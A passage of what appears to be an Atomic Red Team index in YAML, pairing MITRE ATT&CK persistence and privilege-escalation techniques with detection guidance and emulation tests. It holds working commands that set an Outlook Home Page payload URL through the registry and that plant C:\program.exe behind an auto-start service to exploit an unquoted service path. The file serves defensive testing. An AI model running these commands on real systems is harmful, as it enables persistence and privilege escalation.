Retrieved February - 4, 2019. - - source_name: SensePost NotRuler - url: https://github.com/sensepost/notruler - description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler, - provides blue teams with the ability to detect Ruler usage against Exchange. - Retrieved February 4, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Outlook Forms - description: |- - Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms) - - Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms) - id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-26T17:35:15.823Z' - created: '2019-11-07T20:06:02.624Z' - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler) - - Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. - x_mitre_data_sources: - - Mail server - - Process command-line parameters - - Process monitoring - x_mitre_platforms: - - Windows - - Office 365 - atomic_tests: [] - T1137.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1137.004 - url: https://attack.mitre.org/techniques/T1137/004 - - source_name: SensePost Outlook Home Page - url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/ - description: Stalmans, E. (2017, October 11). Outlook Home Page – Another - Ruler Vector. Retrieved February 4, 2019. - - source_name: Microsoft Detect Outlook Forms - url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack - description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook - Rules and Custom Forms Injections Attacks in Office 365. Retrieved February - 4, 2019. - - source_name: SensePost NotRuler - url: https://github.com/sensepost/notruler - description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler, - provides blue teams with the ability to detect Ruler usage against Exchange. - Retrieved February 4, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Outlook Home Page - description: | - Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page) - - Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page) - id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-26T17:35:51.656Z' - created: '2019-11-07T20:09:56.536Z' - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler) - - Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. - x_mitre_data_sources: - - Mail server - - Process monitoring - - Process command-line parameters - x_mitre_platforms: - - Windows - - Office 365 - identifier: T1137.004 - atomic_tests: - - name: Install Outlook Home Page Persistence - auto_generated_guid: 7a91ad51-e6d2-4d43-9471-f26362f5738e - description: | - This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. - - Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). - supported_platforms: - - windows - input_arguments: - url: - description: URL to Outlook Home Page containing the payload to execute - (can be local file:// or remote https://) - type: string - default: file://PathToAtomicsFolder\T1137.004\src\T1137.004.html - outlook_version: - description: Version of Outlook that is installed - type: string - default: 16.0 - outlook_folder: - description: Name of the Outlook folder to modify the homepage setting for - type: string - default: Inbox - executor: - name: command_prompt - elevation_required: false - command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} - /v URL /t REG_SZ /d #{url} /f - -' - cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} - /v URL /f - -' - T1137.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1137.005 - url: https://attack.mitre.org/techniques/T1137/005 - - source_name: SilentBreak Outlook Rules - url: https://silentbreaksecurity.com/malicious-outlook-rules/ - description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved - February 4, 2019. - - source_name: Microsoft Detect Outlook Forms - url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack - description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook - Rules and Custom Forms Injections Attacks in Office 365. Retrieved February - 4, 2019. - - source_name: SensePost NotRuler - url: https://github.com/sensepost/notruler - description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler, - provides blue teams with the ability to detect Ruler usage against Exchange. - Retrieved February 4, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Outlook Rules - description: |- - Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules) - - Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules) - id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-26T17:36:15.923Z' - created: '2019-11-07T20:00:25.560Z' - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler) - - Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. - x_mitre_data_sources: - - Mail server - - Process monitoring - - Process command-line parameters - x_mitre_platforms: - - Windows - - Office 365 - atomic_tests: [] - T1034: - technique: - id: attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Path Interception - description: |- - **This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).** - - Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019) - - There are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. - - ### Unquoted Paths - Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018) - - ### PATH Environment Variable Misconfiguration - The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. - - For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. - - ### Search Order Hijacking - Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. - - For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property) - - Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). - external_references: - - source_name: mitre-attack - external_id: T1034 - url: https://attack.mitre.org/techniques/T1034 - - external_id: CAPEC-159 - source_name: capec - url: https://capec.mitre.org/data/definitions/159.html - - url: https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/ - description: Nagaraju, S. (2014, April 8). MS14-019 – Fixing a binary hijacking - via .cmd or .bat file. Retrieved July 25, 2016. - source_name: TechNet MS14-019 - - url: http://support.microsoft.com/KB/103000 - description: Microsoft. (n.d.). CurrentControlSet\Services Subkey Entries. - Retrieved November 30, 2014. - source_name: Microsoft Subkey - - url: https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464 - description: Baggett, M. (2012, November 8). Help eliminate unquoted path - vulnerabilities. Retrieved December 4, 2014. - source_name: Baggett 2012 - - url: https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ - description: HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted - Services. Retrieved August 10, 2018. - source_name: SecurityBoulevard Unquoted Services APR 2018 - - url: https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/ - description: McFarland, R. (2018, January 26). Windows Privilege Escalation - Guide. Retrieved August 10, 2018. - source_name: SploitSpren Windows Priv Jan 2018 - - url: http://msdn.microsoft.com/en-us/library/ms682425 - description: Microsoft. (n.d.). CreateProcess function. Retrieved December - 5, 2014. - source_name: Microsoft CreateProcess - - url: http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120 - description: Hill, T. (n.d.). Windows NT Command Shell. Retrieved December - 5, 2014. - source_name: Hill NT Shell - - url: http://msdn.microsoft.com/en-us/library/ms687393 - description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014. - source_name: Microsoft WinExec - - url: https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx - description: Microsoft. (n.d.). Environment Property. Retrieved July 27, 2016. - source_name: MSDN Environment Property - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - revoked: false - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-07-06T18:49:35.645Z' - created: '2017-05-31T21:30:36.140Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Windows - x_mitre_permissions_required: - - User - - Administrator - - SYSTEM - x_mitre_effective_permissions: - - User - - Administrator - - SYSTEM - x_mitre_detection: "Monitor file creation for files named after partial directories - and in locations that may be searched for common processes through the environment - variable, or otherwise should not be user writable. Monitor the executing - process for process executable paths that are named for partial directories. - Monitor file creation for programs that are named after Windows system programs - or programs commonly executed without a path (such as \"findstr,\" \"net,\" - and \"python\"). If this activity occurs outside of known administration activity, - upgrades, installations, or patches, then it may be suspicious. \n\nData and - events should not be viewed in isolation, but as part of a chain of behavior - that could lead to other activities, such as network connections made for - Command and Control, learning details about the environment through Discovery, - and Lateral Movement." - x_mitre_contributors: - - Stefan Kanthak - x_mitre_data_sources: - - File monitoring - - Process monitoring - x_mitre_version: '1.0' - x_mitre_deprecated: true - atomic_tests: [] - T1574.007: - technique: - created: '2020-03-13T14:10:43.424Z' - modified: '2020-09-16T16:56:34.583Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern - external_references: - - source_name: mitre-attack - external_id: T1574.007 - url: https://attack.mitre.org/techniques/T1574/007 - - external_id: CAPEC-13 - source_name: capec - url: https://capec.mitre.org/data/definitions/13.html - - external_id: CAPEC-38 - source_name: capec - url: https://capec.mitre.org/data/definitions/38.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Path Interception by PATH Environment Variable - description: |- - Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line. - - The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. - - For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. - id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32 - x_mitre_defense_bypassed: - - Application control - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: |- - Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. - - Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_contributors: - - Stefan Kanthak - x_mitre_platforms: - - Windows - atomic_tests: [] - T1574.008: - technique: - id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2 - description: |- - Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program. - - Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. - - For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property) - - Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). - name: Path Interception by Search Order Hijacking - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.008 - url: https://attack.mitre.org/techniques/T1574/008 - - external_id: CAPEC-159 - source_name: capec - url: https://capec.mitre.org/data/definitions/159.html - - url: http://msdn.microsoft.com/en-us/library/ms682425 - description: Microsoft. (n.d.). CreateProcess function. Retrieved December - 5, 2014. - source_name: Microsoft CreateProcess - - source_name: Windows NT Command Shell - url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120 - description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved - December 5, 2014. - - url: http://msdn.microsoft.com/en-us/library/ms687393 - description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014. - source_name: Microsoft WinExec - - source_name: Microsoft Environment Property - url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN - description: Microsoft. (2011, October 24). Environment Property. Retrieved - July 27, 2016. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-17T19:03:35.217Z' - created: '2020-03-13T17:48:58.999Z' - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Stefan Kanthak - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: | - Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. - - Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_permissions_required: - - Administrator - - User - - SYSTEM - x_mitre_effective_permissions: - - Administrator - - SYSTEM - - User - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - atomic_tests: [] - T1574.009: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.009 - url: https://attack.mitre.org/techniques/T1574/009 - - external_id: CAPEC-38 - source_name: capec - url: https://capec.mitre.org/data/definitions/38.html - - source_name: Microsoft CurrentControlSet Services - url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree - description: Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services - Registry Tree. Retrieved March 16, 2020. - - source_name: Help eliminate unquoted path - url: https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464 - description: Mark Baggett. (2012, November 8). Help eliminate unquoted path - vulnerabilities. Retrieved November 8, 2012. - - source_name: Windows Unquoted Services - url: https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ - description: HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted - Services. Retrieved August 10, 2018. - - source_name: Windows Privilege Escalation Guide - url: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ - description: absolomb. (2018, January 26). Windows Privilege Escalation Guide. - Retrieved August 10, 2018. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Path Interception by Unquoted Path - description: |- - Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. - - Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide) - - This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. - id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-17T19:05:23.755Z' - created: '2020-03-13T13:51:58.519Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_detection: |- - Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. - - Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_contributors: - - Stefan Kanthak - x_mitre_platforms: - - Windows - identifier: T1574.009 - atomic_tests: - - name: Execution of program.exe as service with unquoted service path - auto_generated_guid: 2770dea7-c50f-457b-84c4-c40a47460d9f - description: | - When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability - known as Unquoted Service Path which allows a user to gain SYSTEM privileges. - In this case, if an executable program.exe in C:\ exists, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe. - supported_platforms: - - windows - input_arguments: - service_executable: - description: Path of the executable used for the service and as the hijacked - program.exe - type: path - default: PathToAtomicsFolder\T1574.009\bin\WindowsServiceExample.exe - executor: - command: | - copy #{service_executable} "C:\Program Files\windows_service.exe" - copy #{service_executable} "C:\program.exe" - sc create "Example Service" binpath= "C:\Program Files\windows_service.exe" Displayname= "Example Service" start= auto - sc start "Example Service" - cleanup_command: | - sc stop "Example Service" >nul 2>&1 - sc delete "Example Service" >nul 2>&1 - del "C:\Program Files\windows_service.exe" >nul 2>&1 - del "C:\program.exe" >nul 2>&1 - del "C:\Time.log" >nul 2>&1 - name: command_prompt - elevation_required: true - T1547.011: - technique: - created: '2020-01-24T20:02:59.149Z' - modified: '2020-06-20T19:57:36.136Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a - description: "Adversaries may modify plist files to run a program during system - boot or user login. Property list (plist) files contain all of the information - that macOS and OS X uses to configure applications and services. These files - are UTF-8 encoded and formatted like XML documents via a series of keys surrounded - by < >. They detail when programs should execute, file paths to the executables, - program arguments, required OS permissions, and many others. plists are located - in certain locations depending on their purpose such as /Library/Preferences - (which execute with elevated privileges) and ~/Library/Preferences - (which execute with a user's privileges). \n\nAdversaries can modify plist - files to execute their code as part of establishing persistence. plists may - also be used to elevate privileges since they may execute in the context of - another user.(Citation: Sofacy Komplex Trojan) \n\nA specific plist used for - execution at login is com.apple.loginitems.plist.(Citation: Methods - of Mac Malware Persistence) Applications under this plist run under the logged - in user's context, and will be started every time the user logs in. Login - items installed using the Service Management Framework are not visible in - the System Preferences and can only be removed by the application that created - them.(Citation: Adding Login Items) Users have direct control over login items - installed using a shared file list which are also visible in System Preferences - (Citation: Adding Login Items). Some of these applications can open visible - dialogs to the user, but they don’t all have to since there is an option to - \"hide\" the window. If an adversary can register their own login item or - modified an existing one, then they can use it to execute their code for a - persistence mechanism each time the user logs in (Citation: Malware Persistence - on OS X) (Citation: OSX.Dok Malware). The API method SMLoginItemSetEnabled - can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1059/002) - can do this as well. (Citation: Adding Login Items)" - name: Plist Modification - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.011 - url: https://attack.mitre.org/techniques/T1547/011 - - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ - description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). - Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. - source_name: Sofacy Komplex Trojan - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html - description: Apple. (2016, September 13). Adding Login Items. Retrieved July - 11, 2017. - source_name: Adding Login Items - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. - Retrieved July 10, 2017. - source_name: Malware Persistence on OS X - - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ - description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web - traffic. Retrieved July 10, 2017. - source_name: OSX.Dok Malware - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_detection: |- - File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed. - - All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) - - Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity. - x_mitre_permissions_required: - - User - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1547.011 - atomic_tests: - - name: Plist Modification - auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 - description: 'Modify MacOS plist file in one of two directories - -' - supported_platforms: - - macos - executor: - steps: | - 1. Modify a .plist in - - /Library/Preferences - - OR - - ~/Library/Preferences - - 2. Subsequently, follow the steps for adding and running via [Launch Agent](Persistence/Launch_Agent.md) - name: manual - T1205.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1205.001 - url: https://attack.mitre.org/techniques/T1205/001 - - url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631 - description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible - backdoor. Retrieved October 13, 2018.' - source_name: Hartrell cd00r 2002 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Port Knocking - description: |- - Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. - - This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system. - - The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. - id: attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-10-21T01:26:31.804Z' - created: 